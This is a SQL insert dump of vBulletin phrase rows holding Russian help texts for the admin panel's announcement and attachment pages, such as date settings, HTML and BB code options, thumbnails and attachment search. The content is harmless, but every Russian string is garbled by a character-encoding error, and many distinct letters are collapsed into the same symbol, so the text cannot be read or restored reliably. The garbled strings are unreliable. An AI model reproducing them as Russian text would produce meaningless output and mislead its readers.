(21875, -1, 'announcement_add_edit_startdate_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò Ãà ÷à ëî îòîáðà æåÃèÿ îáúÿâëåÃèÿ. Åñëè äà òà â áóäóùåì, òî îáúÿâëåÃèå áóäåò ñêðûòî äî Ãà ñòóïëåÃèÿ óêà çà ÃÃîé äà òû.', 'vbulletin', '', 0, ''),
(21876, -1, 'announcement_add_edit_startdate_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', '', 0, ''),
(21877, -1, 'announcement_add_edit_enddate_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò äà òó èñ÷åçÃîâåÃèÿ îáúÿâëåÃèÿ îò êîÃå÷Ãûõ ïîëüçîâà òåëåé. ÎáúÿâëåÃèå ÃÃ¥ áóäåò óäà ëåÃî ïîñëå ýòîé äà òû; îäÃà êî îÃî áóäåò ñêðûòî îò ïîëüçîâà òåëåé. Äà æå ïîñëå ýòîé äà òû âû âñ¸ åù¸ ñìîæåòå ñìîòðåòü, ðåäà êòèðîâà òü è/èëè ñÃîâà ñäåëà òü îáúÿâëåÃèå à êòèâÃûì ÷åðåç ïà Ãåëü à äìèÃèñòðà òîðà èëè ìîäåðà òîðà .', 'vbulletin', '', 0, ''),
(21878, -1, 'announcement_add_edit_enddate_title', 'cphelptext', 'ÊîÃå÷Ãà ÿ äà òà ', 'vbulletin', '', 0, ''),
(21879, -1, 'announcement_add_edit_pagetext_text', 'cphelptext', 'Çäåñü äîïóñòèì HTML, BB êîäû è/èëè ñìà éëû, â çà âèñèìîñòè îò òîãî êà êèå âû âûáåðèòå îïöèè.', 'vbulletin', 'zCarot', 1206964390, '3.7.0 Release Candidate 2'),
(21880, -1, 'announcement_add_edit_pagetext_title', 'cphelptext', 'Òåêñò', 'vbulletin', '', 0, ''),
(21881, -1, 'announcement_add_edit_allowbbcode_text', 'cphelptext', 'Ãîçâîëÿåò âà ì èñïîëüçîâà òü ñòà Ãäà ðòÃûå BB êîäû â âà øåì îáúÿâëåÃèè, êà ê åñëè áû âû ïèñà ëè ñîîáùåÃèå Ãà ôîðóìå.', 'vbulletin', 'zCarot', 1206964380, '3.7.0 Release Candidate 2'),
(21882, -1, 'announcement_add_edit_allowbbcode_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû', 'vbulletin', '', 0, ''),
(21883, -1, 'announcement_add_edit_allowsmilies_text', 'cphelptext', 'Ãòî ïîçâîëèò îòîáðà æà òü òåêñò, Ãà ïðèìåð :) è :( , â âèäå óñòà ÃîâëåÃÃûõ ñìà éëîâ, è Ãà îáîðîò, , êà ê åñëè áû âû ïèñà ëè ñîîáùåÃèå Ãà ôîðóìå.', 'vbulletin', '', 0, ''),
(21884, -1, 'announcement_add_edit_allowsmilies_title', 'cphelptext', 'ÊîÃâåðòèðîâà òü ñìà éëû', 'vbulletin', '', 0, ''),
(21885, -1, 'announcement_add_edit_allowhtml_text', 'cphelptext', 'Ãîçâîëÿåò âà ì èñïîëüçîâà òü ñòà Ãäà ðòÃûå HTML êîäû â âà øåì îáúÿâëåÃèè. ÃÃ¥ çà áóäüòå çà êðûòü âñå òåãè, èÃà ÷å îÃè ìîãóò ñìåøà òü ñîäåðæèìîå îáúÿâëåÃèÿ ïðè ïðîñìîòðå êîÃå÷Ãûì ïîëüçîâà òåëåì!', 'vbulletin', '', 0, ''),
(21886, -1, 'announcement_add_edit_allowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML', 'vbulletin', '', 0, ''),
(21887, -1, 'announcement_add_edit_parseurl_text', 'cphelptext', 'Åñëè \"Äà \", òî ôîðóì à âòîìà òè÷åñêè Ãà éä¸ò ññûëêè â òåêñòå è ñäåëà åò âîçìîæÃûì ïåðåõîä ïî Ãèì ïðè Ãà æà òèè Ãà Ãèõ â òåêñòå âà øåãî îáúÿâëåÃèÿ.', 'vbulletin', 'zCarot', 1199282954, '3.7.0 Beta 4'),
(21888, -1, 'announcement_add_edit_parseurl_title', 'cphelptext', 'Àâòîìà òè÷åñêè âñòà âëÿòü ññûëêè', 'vbulletin', 'zCarot', 1199282954, '3.7.0 Beta 4'),
(21889, -1, 'announcement_edit_text', 'cphelptext', 'Îïöèè Ãà ýòîé ñòðà Ãèöå îïèñûâà þòñÿ Ãèæå.', 'vbulletin', '', 0, ''),
(21890, -1, 'announcement_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå îáúÿâëåÃèé', 'vbulletin', '', 0, ''),
(21891, -1, 'announcement_edit_reset_views_text', 'cphelptext', 'Ñòà òóñ ïðî÷òåÃèÿ îïðåäåëÿåò, îòîáðà æà åòñÿ ëè îáúÿâëåÃèå ïðè ïîèñêå \"Ãîâûõ ñîîáùåÃèé\" è \"ÑåãîäÃÿøÃèõ ñîîáùåÃèé\". Êà ê òîëüêî îáúÿâëåÃèå áûëî ïðîñìîòðåÃî, îÃî èñ÷åçÃåò èç ïîèñêà äëÿ ýòîãî ïîëüçîâà òåëÿ. Åñëè óñòà Ãîâèòü çäåñü çÃà ÷åÃèå \"Äà \", òî îáúÿâëåÃèå áóäåò ñÃîâà îòîáðà æà òüñÿ ïðè ïîèñêå Ãîâûõ ñîîáùåÃèé äëÿ âñåõ ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21892, -1, 'announcement_edit_reset_views_title', 'cphelptext', 'ÎáÃóëèòü ñ÷¸ò÷èê ïðîñìîòðîâ', 'vbulletin', 'zCarot', 1154002483, '3.6.0'),
(21893, -1, 'announcement_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå Ãà õîäèòñÿ ñïèñîê âñåõ âà øèõ îáúÿâëåÃèé, îòñîðòèðîâà ÃÃûõ ïî Ãà ÷à ëüÃîé äà òå. \r\n\r\nÑâåðõó Ãà õîäÿòñÿ ãëîáà ëüÃûå îáúÿâëåÃèÿ, êîòîðûå îòîáðà æà þòñÿ âî âñåõ ðà çäåëà õ. ÊÃîïêà \"Ãîâîå\" ïîçâîëÿåò äîáà âèòü Ãîâîå ãëîáà ëüÃîå îáúÿâëåÃèå. (Åñëè ó âà ñ ïîêà Ãåò ãëîáà ëüÃûõ îáúÿâëåÃèé, òî ýòîò ðà çäåë ÃÃ¥ áóäåò îòîáðà æà òüñÿ.  ýòîì ñëó÷à å, ÷òîáû äîáà âèòü Ãîâîå ãëîáà ëüÃîå îáúÿâëåÃèå, ñëåäóåò Ãà æà òü \"Äîáà âèòü Ãîâîå îáúÿâëåÃèå\" â Ãà âèãà öèîÃÃîé ïà Ãåëè.) \r\n\r\nÃèæå âû îáÃà ðóæèòå ñïèñîê êà æäîãî ðà çäåëà , âìåñòå ñî ñïèñêîì îáúÿâëåÃèé äëÿ êà æäîãî ðà çäåëà ôîðóìà . ÃîìÃèòå, ÷òî îòîáðà æåÃèå îáúÿâëåÃèÿ â ýòîì ñïèñêå ÃÃ¥ îçÃà ÷à åò òî, ÷òî îÃî âèäèìî äëÿ ïîëüçîâà òåëåé. ÎáúÿâëåÃèÿ ÃÃ¥ óäà ëÿþòñÿ ïîñëå Ãà ñòóïëåÃèÿ äà òû îêîÃֈ Ãèÿ äåéñòâèÿ - âû äîëæÃû ñà ìîñòîÿòåëüÃî óäà ëÿòü èõ (Ãà æìèòå Ãà ññûëêó \"Óäà ëèòü\" ðÿäîì ñ îáúÿâëåÃèåì), òà êæå âû ìîæåòå çà Ãîâî èõ à êòèâèðîâà òü (Ãà æìèòå Ãà ññûëêó \"Ãåäà êòèðîâà òü\" ðÿäîì ñ îáúÿâëåÃèåì è óêà æèòå Ãîâóþ äà òó îêîÃֈ Ãèÿ, êîòîðà ÿ åù¸ ÃÃ¥ Ãà ñòóïèëà ). \r\nÂû ìîæåòå ïðîñìîòðåòü îáúÿâëåÃèå òà ê æå, êà ê è ëþáîé ïîëüçîâà òåëü, Ãà æà â Ãà Ãà çâà Ãèè ðà çäåëà . \r\n\r\n×òîáû ñîçäà òü Ãîâîå îáúÿâëåÃèå â òðåáóþùåìñÿ ðà çäåëå, Ãà æìèòå Ãà êÃîïêó \"Ãîâîå\" ðÿäîì ñ èìåÃåì ðà çäåëà .', 'vbulletin', '', 0, ''),
(21894, -1, 'announcement_modify_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå îáúÿâëåÃèé', 'vbulletin', '', 0, ''),
(21895, -1, 'announcement_remove_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óäà ëèòü ýòî îáúÿâëåÃèå. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. Âîññòà ÃîâëåÃèå ÃåâîçìîæÃî.', 'vbulletin', '', 0, ''),
(21896, -1, 'announcement_remove_title', 'cphelptext', 'Óäà ëåÃèå îáúÿâëåÃèÿ', 'vbulletin', '', 0, ''),
(21897, -1, 'attachment_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÂëîæåÃèÿ \r\nÑîäåðæèìîå äëÿ ïðîâåðêè \r\n\r\nÂëîæåÃèÿ: \r\nÔîðóì ïîääåðæèâà åò ïðèêðåïëåÃèå ôà éëîâ â ñîîáùåÃèÿ, Ãà çûâà åìûå âëîæåÃèÿìè. ÂëîæåÃèÿ â ñîîáùåÃèÿ ïîëåçÃû äëÿ ïðèêðåïëåÃèÿ ê ñîîáùåÃèþ êà êîãî-ëèáî ñâÿçà ÃÃîãî ñ Ãèì ôà éëà , âêëþ÷à ÿ èçîáðà æåÃèÿ, òåêñò, à ðõèâû è äðóãèå òèïû ôà éëîâ, êîòîðûå âû ðà çðåøèòå ïðèêðåïëÿòü ê ñîîáùåÃèÿì. \r\n\r\nÔîðóì ïðåäëà ãà åò äâà ñïîñîáà õðà ÃÃ¥Ãèÿ âëîæåÃèé: 1) âû ìîæåòå õðà Ãèòü èõ â áà çå äà ÃÃûõ èëè 2) âû ìîæåòå õðà Ãèòü èõ â ôà éëîâîé ñèñòåìå Ãà âà øåì ñåðâåðå. Îáà ìåòîäà èìåþò ïðåèìóùåñòâà è Ãåäîñòà òêè. Ãà çà äà ÃÃûõ áîëåå ýôôåêòèâÃà â ðà çìåðå çà Ãèìà åìûõ ôà éëîâ è ïîçâîëÿåò áûñòðî äåëà òü ðåçåðâÃóþ êîïèþ ëþáûõ ôà éëîâ. ÎäÃà êî, õðà ÃÃ¥Ãèå âëîæåÃèé â áà çå äà ÃÃûõ äîïîëÃèòåëüÃî ïåðåãðóæà åò å¸, êîãäà ïîëüçîâà òåëè ñêà ÷èâà þò ôà éëû. Ãî ñ ïîìîùüþ áà çû äà ÃÃûõ âû ñìîæåòå îãðà Ãè÷èòü äîñòóï ê âëîæåÃèÿì, áåç èñïîëüçîâà Ãèÿ ñèñòåìû áåçîïà ñÃîñòè ôîðóìà è ïðà â äèðåêòîðèé êà ê htaccess. \r\n\r\nÑèñòåìà âëîæåÃèé ôîðóìà ïîçâîëÿåò âà ì óêà çà òü ìà êñèìà ëüÃûé ðà çìåð ôà éëîâ äëÿ êà æäîãî òèïà âëîæåÃèé. Ãåêîòîðûå òèïû ôà éëîâ ìîãóò áûòü áîëüøå (Ãà ïðèìåð, âèäåî è èçîáðà æåÃèÿ ïî îòÃîøåÃèþ ê òåêñòó) è ýòà âîçìîæÃîñòü ïîçâîëÿåò âà ì òîÃêî Ãà ñòðîèòü ñèñòåìó. \r\n\r\n ïðîäîëæåÃèè òåìû î ìà êñèìà ëüÃîì ðà çìåðå ôà éëà , ôîðóì ïîçâîëÿåò âà ì îãðà Ãè÷èòü îáùèé ðà çìåð âñåõ âëîæåÃèé ïîëüçîâà òåëÿ Ãà óðîâÃÃ¥ ãðóïïû (ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé ). Ãòî ïîëåçÃî äëÿ ïðåäîòâðà ùåÃèÿ çà Ãèìà Ãèÿ âëîæåÃèÿìè îïðåäåëåÃÃîãî ïîëüçîâà òåëÿ áîëüøîãî ìåñòà . \r\n\r\nÄðóãà ÿ ïðèÿòÃà ÿ îñîáåÃÃîñòü ñèñòåìû âëîæåÃèé ôîðóìà - ïîääåðæêà ìèÃèà òþð. Âû ìîæåòå Ãà ñòðîèòü ôîðóì òà ê, ÷òî êîãäà ïîëüçîâà òåëü ñîçäà åò âëîæåÃèå â âèäå èçîáðà æåÃèÿ, ôîðóì ãåÃåðèðóåò ìèÃèà òþðÃóþ âåðñèþ èçîáðà æåÃèÿ (ìèÃèà òþðó), êîòîðà ÿ ññûëà åòñÿ Ãà ïîëÃóþ âåðñèþ. Ãòî ïîëåçÃî äëÿ ïðåäîòâðà ùåÃèÿ âñòà âêè áîëüøèõ èçîáðà æåÃèé, ÷òî ðà ñòÿãèâà åò ñîäåðæèìîå âà øåãî ôîðóìà . Âû ìîæåòå Ãà ñòðîèòü ìèÃèà òþðû è äðóãèå îïöèè âëîæåÃèÿ â âà øèõ ÎñÃîâÃûõ Ãà ñòðîéêà õ . Åñëè âû èñïîëüçóåòå áèáëèîòåêó ImageMagick, òî âû ìîæåòå ñîçäà âà òü ìèÃèà òþðû äîïîëÃèòåëüÃûõ òèïîâ èçîáðà æåÃèé: BMP, TIF, PSD, è PDF. Ó âà ñ äîëæÃà áûòü óñòà ÃîâëåÃû ïîñëåäÃèå âåðñèè ImageMagick è Ghostscript äëÿ ñîçäà Ãèÿ ìèÃèà òþð PDF ôà éëîâ. ÌèÃèà òþðèçà öèÿ áîëüøèõ PDF ôà éëîâ ìîæåò âûçâà òü ïðîáëåìû, ïîýòîìó èñïîëüçóéòå ýòó îïöèþ ñ îñòîðîæÃîñòüþ. \r\n\r\nÊà ê è äðóãèå ïðà âà ðà çäåëà Ãà ôîðóìå, âîçìîæÃîñòü ïîëüçîâà òåëþ äåëà òü âëîæåÃèÿ ìîæåò áûòü óñòà ÃîâëåÃà Ãà óðîâÃÃ¥ ãðóïïû (ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé ), è Ãà óðîâÃÃ¥ ãðóïïû äëÿ ñïåöèôè÷åñêîãî ðà çäåëà (ñì. Ãðà âà Ãà ôîðóìå ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21898, -1, 'attachment_title', 'cphelptext', 'ÃŽ âëîæåÃèÿõ', 'vbulletin', '', 0, ''),
(21899, -1, 'attachment_delete_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå ïåðåä óäà ëåÃèåì âëîæåÃèÿ. Ãîæà ëóéñòà , óäîñòîâåðüòåñü, ÷òî âû ñîáèðà åòåñü óäà ëèòü èìåÃÃî âëîæåÃèå, êîòîðîå âûáðà ëè. Äëÿ ïðîäîëæåÃèÿ Ãà æìèòå êÃîïêó \"Äà \".', 'vbulletin', '', 0, ''),
(21900, -1, 'attachment_delete_title', 'cphelptext', 'Óäà ëåÃèå âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(21901, -1, 'attachment_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ðåäà êòèðîâà òü èëè ïåðåìåùà òü ñóùåñòâóþùåå âëîæåÃèå. Îïöèè îïèñûâà þòñÿ Ãèæå.', 'vbulletin', '', 0, ''),
(21902, -1, 'attachment_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(21903, -1, 'attachment_edit_upload_text', 'cphelptext', 'Âûáåðèòå âëîæåÃèå Ãà âà øåì êîìïüþòåðå. Òåêóùåå âëîæåÃèå áóäåò çà ìåÃÃ¥Ãî âûáðà ÃÃûì ôà éëîì. ID âëîæåÃèÿ áóäåò ñîõðà øÃ.', 'vbulletin', '', 0, ''),
(21904, -1, 'attachment_edit_upload_title', 'cphelptext', 'Çà ãðóçèòü', 'vbulletin', '', 0, ''),
(21905, -1, 'attachment_edit_url_text', 'cphelptext', 'Óêà æèòå ïîëÃûé à äðåñ ê ôà éëó, ÷òîáû ôîðóì ñìîã çà ãðóçèòü åãî è ïðèêðåïèòü ê ñîîáùåÃèþ. Ãðèìåð: \r\n\r\nhttp://imgl.yandex.net/i/www/logo.png', 'vbulletin', 'zCarot', 1205943297, '3.7.0 Release Candidate 1'),
(21906, -1, 'attachment_edit_url_title', 'cphelptext', 'Óäà ë¸ÃÃà ÿ çà ãðóçêà ', 'vbulletin', '', 0, ''),
(21907, -1, 'attachment_edit_a_filename_text', 'cphelptext', 'Çäåñü âû ìîæåòå èçìåÃèòü èìÿ ôà éëà ñóùåñòâóþùåãî âëîæåÃèÿ.', 'vbulletin', '', 0, ''),
(21908, -1, 'attachment_edit_a_filename_title', 'cphelptext', 'Èìÿ ôà éëà ', 'vbulletin', '', 0, ''),
(21909, -1, 'attachment_edit_a_counter_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, ñêîëüêî ðà ç ýòî âëîæåÃèå áûëî ïðîñìîòðåÃî (èëè ñêà ÷à Ãî).', 'vbulletin', '', 0, ''),
(21910, -1, 'attachment_edit_a_counter_title', 'cphelptext', 'Ãðîñìîòðîâ', 'vbulletin', '', 0, ''),
(21911, -1, 'attachment_edit_a_visible_text', 'cphelptext', 'Åñëè âû âûáåðèòå â ýòîé îïöèè \"Ãåò\", òî âëîæåÃèå ÃÃ¥ áóäåò îòîáðà æà òüñÿ ñ ñîîáùåÃèåì â showthread.php. Ãîñëå ýòîãî âëîæåÃèå áóäåò ðà ññìà òðèâà òüñÿ êà ê îæèäà þùåå ïðîâåðêè. Âû ñìîæåòå Ãà éòè åãî â ÂëîæåÃèÿ > Ãðîâåðêà âëîæåÃèé.', 'vbulletin', '', 0, ''),
(21912, -1, 'attachment_edit_a_visible_title', 'cphelptext', 'Âèäèìà ', 'vbulletin', '', 0, ''),
(21913, -1, 'attachment_intro_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå åñòü Ãåñêîëüêî äðóãèõ îïöèé ïî ïîèñêó âëîæåÃèé. (Ñì. Ãåçóëüòà òû ïîèñêà âëîæåÃèé ) \r\n\r\nÑâåðõó Ãà õîäÿòñÿ Ãåñêîëüêî ññûëîê äëÿ îáùåãî ïîèñêà : \r\nÃà èáîëüøèå âëîæåÃèÿ : ýòî ïîèñê âëîæåÃèé ñ ñîðòèðîâêîé ïî ðà çìåðó, ïðè÷åì Ãà èáîëüøèå - ïåðâûå. \r\n\r\nÑà ìûå ïîïóëÿðÃûå âëîæåÃèÿ : ýòî îòñîðòèðóåò ðåçóëüòà òû ïîèñêà âëîæåÃèé ïî êîëè÷åñòâó ñêà ÷èâà Ãèé, ïðè÷åì ñà ìûå ñêà ÷èâà åìûå - ïåðâûå. \r\n\r\nÃîâåéøèå âëîæåÃèÿ : ýòî ïîèñê âëîæåÃèé è ñîðòèðîâêà èõ ïî äà òå, ïðè÷åì Ãîâåéøèå - ïåðâûå. \r\n\r\nÑòà ðåéøèå âëîæåÃèÿ : âûáîð ýòîãî îòñîðòèðóåò âñå âëîæåÃèÿ ïî äà òå, ïðè÷åì ñòà ðåéøèå - ïåðâûå. \r\n\r\nÌà ññîâîå óäà ëåÃèå âëîæåÃèé Ãà õîäèò âñå âëîæåÃèÿ ñòà ðøå óêà çà ÃÃîé äà òû (ïî óìîë÷à Ãèþ 30 äÃåé). Ââåäèòå æåëà åìûé âîçðà ñò è Ãà æìèòå \"Ãðîñìîòð ðåçóëüòà òîâ\". \r\n\r\n ÄîïîëÃèòåëüÃîì ïîèñêå âëîæåÃèé, âû ìîæåòå óêà çà òü ñïåöèôè÷åñêèå ïà ðà ìåòðû ïîèñêà . Ãà ðà ìåòðû ïîèñêà îïèñûâà þòñÿ Ãèæå.', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(21914, -1, 'attachment_intro_title', 'cphelptext', 'Ãîèñê îïðåäåëåÃÃûõ âëîæåÃèé', 'vbulletin', '', 0, ''),
(21915, -1, 'attachment_intro_prunedate_text', 'cphelptext', 'Âû ìîæåòå Ãà éòè âñå âëîæåÃèÿ, ñòà ðøå X äÃåé è Ãà ïîñëåäóþùåì ýêðà ÃÃ¥ áûñòðî óäà ëèòü èõ.', 'vbulletin', '', 0, ''),
(21916, -1, 'attachment_intro_prunedate_title', 'cphelptext', 'Ìà ññîâîå óäà ëåÃèå: Ãà éòè âñå âëîæåÃèÿ ñòà ðøå ÷åì X äÃåé', 'vbulletin', '', 0, ''),
(21917, -1, 'attachment_intro_filename_text', 'cphelptext', 'Ãòî ðåãèñòðî-çà âèñèìûé ïîèñê èì¸à ôà éëîâ, ïî ââåä¸ÃÃîé ñþäà ñòðîêå. Çäåñü óêà çûâà åòñÿ òà êæå ðà ñøèðåÃèÿ (Ãà ïðèìåð, .jpg èëè .txt).', 'vbulletin', '', 0, ''),
(21918, -1, 'attachment_intro_filename_title', 'cphelptext', 'Èìÿ ôà éëà ', 'vbulletin', '', 0, ''),
(21919, -1, 'attachment_intro_attachedby_text', 'cphelptext', 'Åñëè âû æåëà åòå îãðà Ãè÷èòü ïîèñê âëîæåÃèé ïî îïðåäåëåÃÃîìó ïîëüçîâà òåëþ, òî ââåäèòå ñþäà ÃóæÃîå èìÿ.', 'vbulletin', '', 0, ''),
(21920, -1, 'attachment_intro_attachedby_title', 'cphelptext', 'ÂëîæåÃî', 'vbulletin', '', 0, ''),
(21921, -1, 'attachment_intro_datelinebefore_text', 'cphelptext', 'Ââåäèòå äà òó, äî êîòîðîé äîëæÃû áûòü ñäåëà Ãû âëîæåÃèÿ. Ôîðìà ò ÃÃÃÃ-ÌÌ-ÄÄ ××:ÌÌ:ÑÑ. Ãà ïðèìåð, 2005-02-20 17:33:41. Èñïîëüçóéòå 24-õ ÷à ñîâîé ôîðìà ò; òî åñòü ïðåîáðà çóéòå 05:35:36 PM â 17:35:36.', 'vbulletin', '', 0, ''),
(21922, -1, 'attachment_intro_datelinebefore_title', 'cphelptext', 'ÂëîæåÃî äî', 'vbulletin', '', 0, ''),
(21923, -1, 'attachment_intro_datelineafter_text', 'cphelptext', 'Âû òà êæå ìîæåòå óñòà Ãîâèòü Ãà ÷à ëüÃóþ äà òó, òî åñòü âëîæåÃèÿ äîëæÃû áûòü ñäåëà Ãû ïîñëå Ãå¸. Ôîðìà ò ÃÃÃÃ-ÌÌ-ÄÄ ××:ÌÌ:ÑÑ. Ãà ïðèìåð, 2005-02-20 17:33:41. Èñïîëüçóéòå 24 ÷à ñîâîé ôîðìà ò; òî åñòü ïðåîáðà çóéòå 05:35:36 PM â 17:35:36. ÃîìÃèòå, ÷òî åñëè âû èñïîëüçóéòå îáà ïóÃêòà \"ÂëîæåÃî äî\" è \"ÂëîæåÃî ïîñëå\", òî äà òà \"ÂëîæåÃî ïîñëå\" äîëæÃà áûòü ðà Ãüøå äà òû \"ÂëîæåÃî äî\", èÃà ÷å ïåðèîäà äëÿ ïîèñêà ÃÃ¥ áóäåò!', 'vbulletin', '', 0, ''),
(21924, -1, 'attachment_intro_datelineafter_title', 'cphelptext', 'ÂëîæåÃî ïîñëå', 'vbulletin', '', 0, ''),
(21925, -1, 'attachment_intro_downloadsmore_text', 'cphelptext', 'Ãîèñê âëîæåÃèé, êîòîðûå ñêà ÷èâà ëèñü áîëüøå ÷åì X ðà ç, X - ÷èñëî, êîòîðîå óêà çûâà åòå âû.', 'vbulletin', '', 0, ''),
(21926, -1, 'attachment_intro_downloadsmore_title', 'cphelptext', 'Ãîëåå X çà ãðóçîê', 'vbulletin', '', 0, ''),
(21927, -1, 'attachment_intro_downloadsless_text', 'cphelptext', 'Ãîèñê âëîæåÃèé, êîòîðûå ñêà ÷èâà ëèñü ìåÃüøå ÷åì X ðà ç, X - ÷èñëî, êîòîðîå óêà çûâà åòå âû. ÃîìÃèòå, ÷òî åñëè âû èñïîëüçóåòå îäÃîâðåìåÃÃî \"Ãîëüøå ÷åì X ñêà ÷èâà Ãèé\" è \"ÌåÃüøå ÷åì X ñêà ÷èâà Ãèé\", òî ÷èñëî \"Ãîëüøå ÷åì X ñêà ÷èâà Ãèé\" äîëæÃî áûòü ìåÃüøå ÷èñëà \"ÌåÃüøå ÷åì X ñêà ÷èâà Ãèé\", â ïðîòèâÃîì ñëó÷à å ÃÃ¥ áóäåò äèà ïà çîÃà äëÿ ïîèñêà !', 'vbulletin', '', 0, ''),
(21928, -1, 'attachment_intro_downloadsless_title', 'cphelptext', 'ÌåÃåå X çà ãðóçîê', 'vbulletin', '', 0, ''),
(21929, -1, 'attachment_intro_sizemore_text', 'cphelptext', 'Ââåäèòå ìèÃèìà ëüÃûé ðà çìåð âëîæåÃèÿ (â áà éòà õ). ÃîìÃèòå, ÷òî ðà çìåð â áà éòà õ, à ÃÃ¥ â êèëîáà éòà õ.', 'vbulletin', '', 0, ''),
(21930, -1, 'attachment_intro_sizemore_title', 'cphelptext', 'Ãà çìåð ôà éëà áîëüøå ÷åì', 'vbulletin', '', 0, ''),
(21931, -1, 'attachment_intro_sizeless_text', 'cphelptext', 'Ââåäèòå ìà êñèìà ëüÃûé ðà çìåð âëîæåÃèÿ (â áà éòà õ). ÃîìÃèòå, ÷òî ðà çìåð â áà éòà õ, à ÃÃ¥ â êèëîáà éòà õ! ÃîìÃèòå, ÷òî åñëè âû èñïîëüçóåòå îäÃîâðåìåÃÃî \"Ãà çìåð ôà éëà áîëüøå ÷åì\" è \"Ãà çìåð ôà éëà ìåÃüøå ÷åì\", òî \"Ãà çìåð ôà éëà áîëüøå ÷åì\" äîëæåà áûòü ìåÃüøå, ÷åì \"Ãà çìåð ôà éëà ìåÃüøå ÷åì\", èÃà ÷å ÃÃ¥ áóäåò äèà ïà çîÃà äëÿ ïîèñêà !', 'vbulletin', '', 0, ''),
(21932, -1, 'attachment_intro_sizeless_title', 'cphelptext', 'Ãà çìåð ôà éëà ìåÃüøå ÷åì', 'vbulletin', '', 0, ''),
(21933, -1, 'attachment_intro_visible_text', 'cphelptext', 'Åñëè ó âà ñ èäåò ïðîâåðêà âëîæåÃèé è åñòü âëîæåÃèÿ, êîòîðûå äî ñèõ ïîð ÃÃ¥ ïðîâåðåÃû, èëè âû ñà ìîñòîÿòåëüÃî ðåäà êòèðîâà ëè âëîæåÃèå è îòïðà âèëè åãî Ãà ïîâòîðÃóþ ïðîâåðêó, òî óñòà Ãîâêà ýòîé îïöèè Ãà Ãåò ïîçâîëèò Ãà éòè òîëüêî òà êèå âëîæåÃèÿ.', 'vbulletin', 'zCarot', 1204936607, '3.7.0 Release Candidate 1'),
(21934, -1, 'attachment_intro_visible_title', 'cphelptext', 'ÂëîæåÃèå ïðîâåðåÃî', 'vbulletin', '', 0, ''),
(21935, -1, 'attachment_intro_orderby_text', 'cphelptext', 'Âû ìîæåòå îòñîðòèðîâà òü âà øè ðåçóëüòà òû ïîèñêà ïî Ãåñêîëüêèì îïöèÿì â âîçðà ñòà þùåì èëè óáûâà þùåì ïîðÿäêå. Ñîðòèðîâêà èä¸ò ïî ïà ðà ìåòðà ì: ÂëîæåÃî, Çà ãðóæåÃî, Èìÿ ôà éëà , Ãà çìåð ôà éëà , Âðåìÿ âëîæåÃèÿ, Âèäèìîñòü. Ãòî ÃÃ¥ ïîâëèÿåò Ãà ñà ì ïîèñê, à ïðîñòî èçìåÃèò âà ðèà Ãò îòîáðà æåÃèÿ ðåçóëüòà òîâ.', 'vbulletin', '', 0, ''),
(21936, -1, 'attachment_intro_orderby_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''),
(21937, -1, 'attachment_intro_results_text', 'cphelptext', 'Îïðåäåëÿåò êîëè÷åñòâî ðåçóëüòà òîâ ïîèñêà , îòîáðà æà åìûõ Ãà êà æäîé ñòðà Ãèöå. ÃÃ¥ ðåêîìåÃäóåòñÿ óêà çûâà òü çäåñü î÷åÃü áîëüøîå ÷èñëî, èñõîäÿ èç ñîîáðà æåÃèé óëó÷øåÃèÿ ïðîèçâîäèòåëüÃîñòè.', 'vbulletin', '', 0, ''),
(21938, -1, 'attachment_intro_results_title', 'cphelptext', 'ÂëîæåÃèé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(21939, -1, 'attachment_massdelete_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü âëîæåÃèÿ, âûáðà ÃÃûå Ãà ïðåäûäóùåé ñòðà Ãèöå. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(21940, -1, 'attachment_massdelete_title', 'cphelptext', 'Óäà ëåÃèå âëîæåÃèé', 'vbulletin', '', 0, ''),
(21941, -1, 'attachment_removetype_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü óêà çà ÃÃûé òèï âëîæåÃèÿ. Ãîæà ëóéñòà , óáåäèòåñü â ïðà âèëüÃîñòè òèïà âëîæåÃèÿ è Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïðîäîëæåÃèÿ.', 'vbulletin', '', 0, ''),
(21942, -1, 'attachment_removetype_title', 'cphelptext', 'Óäà ëåÃèå òèïà âëîæåÃèÿ', 'vbulletin', '', 0, ''),
